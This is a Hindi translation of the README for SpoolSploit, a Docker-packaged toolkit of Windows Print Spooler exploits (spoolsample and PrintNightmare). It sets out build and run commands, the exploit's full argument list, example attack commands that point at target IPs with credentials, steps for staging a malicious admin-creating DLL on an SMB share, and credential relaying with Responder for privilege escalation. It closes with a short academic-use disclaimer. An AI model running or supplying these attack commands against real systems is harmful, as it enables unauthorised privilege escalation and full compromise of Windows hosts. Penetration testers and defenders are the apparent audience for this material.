
विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का एक संग्रह जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत है।
विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का एक संग्रह जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत किया गया है।
SpoolSploit एक संग्रह है विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत किया गया है। विशेषाधिकार को बढ़ाने और पूर्ण सिस्टम एक्सेस के साथ एंडपॉइंट पर दुर्भावनापूर्ण DLL निष्पादित करने के लिए मशीन खाता क्रेडेंशियल्स को रिले करना एक अत्यधिक प्रभावी तरीका होगा।

रिलीज़ तिथि के अनुसार, SpoolSploit Docker कंटेनर का परीक्षण MacOS, Ubuntu Linux, और Windows 10 के नवीनतम संस्करणों पर सफलतापूर्वक किया गया है।
हालांकि आवश्यक नहीं है, यदि आप SpoolSploit कंटेनर के अंदर ही दुर्भावनापूर्ण DLL होस्ट करना या क्रेडेंशियल रिले हमले करना चाहते हैं, तो आपको यह सुनिश्चित करना चाहिए कि Docker चलाने वाले होस्ट पर पोर्ट 445 उपयोग में न हो। यह सबसे अधिक तब होता है जब इस कंटेनर को Windows होस्ट पर चलाया जाता है, क्योंकि यह डिफ़ॉल्ट रूप से पोर्ट 445 का उपयोग करता है। यदि आपके होस्ट पर पोर्ट 445 को अक्षम करना व्यावहारिक नहीं है, तो यह ठीक है! आप बस डॉकर कंटेनर को एक वर्चुअल मशीन में चला सकते हैं जिसमें नेटवर्क एडॉप्टर ब्रिज मोड में कॉन्फ़िगर किया गया हो। यह आपको दुर्भावनापूर्ण DLL और रिले क्रेडेंशियल्स प्रदान करने की अनुमति देगा। यदि आप केवल दुर्भावनापूर्ण DLL प्रदान करना चाहते हैं, तो आप बस अपने होस्ट OS या एक समझौता किए गए सर्वर शेयर पर एक अनाम एक्सेस शेयर पर DLL होस्ट कर सकते हैं।
git clone https://github.com/BeetleChunks/SpoolSploit
cd SpoolSploit
sudo docker build -t spoolsploit .
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
sudo docker exec -it spoolsploit /bin/bash
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD
optional arguments:
-h, --help show this help message and exit
-a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, --rhost RHOST
Remote target IP, CIDR range, or filename (file:<path>)
-rP {139,445}, --rport {139,445}
Remote SMB server port.
-lH LHOST, --lhost LHOST
Listening hostname or IP
-lS LSHARE, --lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, --domain DOMAIN
Domain for authentication
-u USER, --username USER
Username for authentication
-p PASSWD, --password PASSWD
Password for authentication
Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
SpoolSploit Docker कंटेनर में SpoolSploit में spoolsample हमले को निष्पादित करने से प्राप्त मशीन खाता हैश को रिले करने के लिए Responder शामिल है। चूंकि कई उत्कृष्ट लेख विशेषाधिकार वृद्धि के लिए विशेषाधिकार प्राप्त मशीन खाता क्रेडेंशियल्स को रिले करने की प्रक्रिया का विवरण देते हैं, मैं यहां उन विवरणों में नहीं जाऊंगा।
SpoolSploit कंटेनर में Impacket के माध्यम से कार्यान्वित एक SMB सर्वर शामिल है। इस सर्वर का उपयोग SpoolSploit में printnightmare हमले को निष्पादित करते समय दुर्भावनापूर्ण DLL होस्ट करने के लिए किया जा सकता है। डिफ़ॉल्ट SMB सर्वर सेटिंग्स काम करती हैं, लेकिन यदि आप उन्हें अनुकूलित करना चाहते हैं, तो आप /home/dlogmas/smbserver/smb-v1.conf पर स्थित कॉन्फ़िगरेशन फ़ाइल को संशोधित कर सकते हैं।
आपको केवल इतना करना है कि अपने DLL को SpoolSploit कंटेनर में SMB सर्वर के शेयर फ़ोल्डर में कॉपी करें। कंटेनर में शेयर पथ /home/dlogmas/smbserver/share/ है। निम्नलिखित कमांड दर्शाते हैं कि SpoolSploit कंटेनर में DLL कैसे अपलोड करें और इसे SMB सर्वर के लिए सुलभ बनाएं।
sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'
यह प्रूफ-ऑफ-कॉन्सेप्ट कोड अकादमिक अनुसंधान के लिए बनाया गया है और इसका उपयोग सिस्टम के खिलाफ नहीं किया जाना है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। कोड बिना किसी गारंटी या इसके निष्पादन के वादे के प्रदान किया गया है। मैं इस कोड के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हूँ।